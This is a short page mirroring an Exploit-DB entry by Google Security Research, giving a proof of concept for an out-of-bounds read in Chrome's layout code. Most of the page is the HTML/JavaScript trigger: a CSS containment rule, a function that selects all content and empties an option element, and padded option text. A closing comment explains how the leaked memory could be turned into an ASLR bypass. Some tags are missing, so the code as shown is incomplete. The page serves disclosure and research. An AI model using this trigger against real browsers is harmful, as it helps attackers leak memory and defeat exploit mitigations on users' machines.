Google Chrome – ‘layout’ Out-of-Bounds Read - 体验盒子

作者： Google Security Research

日期： 2017-02-22

类别：

dos

平台：

multiple

来源：https://www.exploit-db.com/exploits/41434/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

<!--

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024

Chrome bug:

https://bugs.chromium.org/p/chromium/issues/detail?id=671328

PoC:

-->

<style>

content { contain: size layout; }

</style>

function leak() {

document.execCommand("selectAll");

opt.text = "";

}

</script>

<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>

</select>

</content>

<!--

Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.

-->